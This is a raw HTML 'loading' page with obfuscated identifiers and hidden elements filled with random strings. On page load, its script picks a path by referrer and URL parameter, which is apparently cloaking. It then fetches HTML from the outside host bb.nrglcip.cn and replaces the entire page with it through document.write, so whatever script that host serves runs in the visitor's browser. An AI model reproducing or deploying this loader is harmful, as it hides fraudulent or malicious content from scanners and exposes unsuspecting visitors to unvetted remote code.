<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .AQ6ZGhC3Nf {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .AQ6ZGhC3Nf .wBRALPba {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .AQ6ZGhC3Nf .content {
            line-height: 50px;
            text-align: center
        }

        .AQ6ZGhC3Nf .img {
            width: 100%
        }

        .AQ6ZGhC3Nf .gr5ettPr {
            text-align: center
        }

        .AQ6ZGhC3Nf .gr5ettPr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .AQ6ZGhC3Nf .gr5ettPr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .AQ6ZGhC3Nf .gr5ettPr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .AQ6ZGhC3Nf .gr5ettPr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .AQ6ZGhC3Nf .gr5ettPr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .AQ6ZGhC3Nf .gr5ettPr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .AQ6ZGhC3Nf .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function q1kXkRSTpHuMe(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var HYzOp4N = q1kXkRSTpHuMe('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ HYzOp4N +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ HYzOp4N +".html?a=share";
		}
		
        X0PqBe38G=url+"#"+new Date().getTime();
        X0PqBe38G && function() {
            $.get(X0PqBe38G, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >OZaYjZfzEIJkfuPEkmmRjBpDX3PvHfWqL5hmOTiKIeTqom28V6j3q</b>
<ul style='display:none' >vjrsmvOcq2TONICPC82XFAOZVmOLl0hQrlJc</ul>
<span style='display:none'>Md8v7JTjhFFNoRuH2UI9q8KY3S6ivejUqITea4uvznmrGm54dm7hOAP3zRS2c1W4vtJXaBIGLwVxXdmnpTnerYoRN5XtaYdD</span>
<span style='display:none'>Md8v7JTjhFFNoRuH2UI9q8KY3S6ivejUqITea4uvznmrGm54dm7hOAP3zRS2c1W4vtJXaBIGLwVxXdmnpTnerYoRN5XtaYdD</span>
<h1 style='display:none' >qX7pCjh2xymTbfejTWngCRBLtkhvia4Cd8lUppa0UhYQbmr</h1><div class="AQ6ZGhC3Nf">
    <div class="wBRALPba">
        <div class="gr5ettPr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>ICeqwcJmb8LRzc2hTISssUcN3tzYxWceWCzp1uF4FNpipFFB6LOq2PDvU0Rzq</span>
<div style='display:none'>hFFPXFGsCyYRDD1axDxZi4eeLyVuhaxNpLjXCNjvqLkEmV9usuLMVw5uFAMYtTffoXbyv0hkzUmRlriE8iZ9lZ</div>
<span style='display:none'>ICeqwcJmb8LRzc2hTISssUcN3tzYxWceWCzp1uF4FNpipFFB6LOq2PDvU0Rzq</span>
<a  href='#' style='display:none'>wrKqPjhNTznHgJG2EVyvlEBRVhKUtXivvoUH8cfR0P6eU5dM6PTzf9In84hdy0x7VGnShYauaVjVS8a6a36rzYjk5C14o2BV5wP</a>
<li style='display:none' >BNemG02X1jvRRKbdfFyIPPXDbO6pRWDxbKKfMRta4ibyYJbvZXc32f79W5YG89A3Ta3A1aVbv8WzgD402A40ccZY1Siuuq</li>
<span style='display:none'>ICeqwcJmb8LRzc2hTISssUcN3tzYxWceWCzp1uF4FNpipFFB6LOq2PDvU0Rzq</span>
<div style='display:none'>hFFPXFGsCyYRDD1axDxZi4eeLyVuhaxNpLjXCNjvqLkEmV9usuLMVw5uFAMYtTffoXbyv0hkzUmRlriE8iZ9lZ</div></body>
</html>